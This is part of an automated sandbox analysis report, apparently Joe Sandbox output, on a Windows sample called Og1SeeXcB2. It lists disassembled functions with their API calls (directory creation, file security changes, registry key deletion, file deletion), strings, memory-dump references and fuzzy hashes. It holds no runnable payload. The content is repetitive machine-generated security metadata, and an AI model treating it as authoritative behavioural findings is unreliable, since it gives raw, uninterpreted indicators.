                                                                                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                  • Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                                                                                                                                                  • Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C
                                                                                                                                                                                                                                  Function 00405912 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405969
                                                                                                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405988
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                                                                                                                                                                                                                                  • C:\Users\user\Desktop, xrefs: 00405912
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                                  • API String ID: 3449924974-2028306314
                                                                                                                                                                                                                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                  • Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9
                                                                                                                                                                                                                                  Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                                                                                                                  • Opcode ID: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                                                                                                                                                                                  • Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8
                                                                                                                                                                                                                                  Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1354259210-0
                                                                                                                                                                                                                                  • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                                                                                                                                                  • Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8
                                                                                                                                                                                                                                  Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                                                  • Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                                                                                                                                                  • Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                                                                                  Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                                                                                                                  • Opcode ID: 9a6f1723ccae85cdcaba9e8d0745f1ec3aecba43bd242a0864222bc0e19a8310
                                                                                                                                                                                                                                  • Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a6f1723ccae85cdcaba9e8d0745f1ec3aecba43bd242a0864222bc0e19a8310
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D
                                                                                                                                                                                                                                  Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                  • Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                                                                                                                                                  • Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                                                                                                                                                                                  Function 00404BDE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404C88
                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                  • Opcode ID: 6bd36fcdb12aee5803283967c3a86c6e4a5ad70b015d4a675e33b43a1d1abb6e
                                                                                                                                                                                                                                  • Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bd36fcdb12aee5803283967c3a86c6e4a5ad70b015d4a675e33b43a1d1abb6e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8
                                                                                                                                                                                                                                  Function 00405CB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CB6
                                                                                                                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CC0
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CD2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                  • API String ID: 2659869361-3081826266
                                                                                                                                                                                                                                  • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                                                                  • Instruction ID: ab420094dca872cde134391ad8eb9d2612fe0bdf2854729f0df44d947378a899
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FD0A771101A30AAC1116B499D04DEF72ACEE85304741003FF641B30A0CB7C5D5297FD
                                                                                                                                                                                                                                  Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
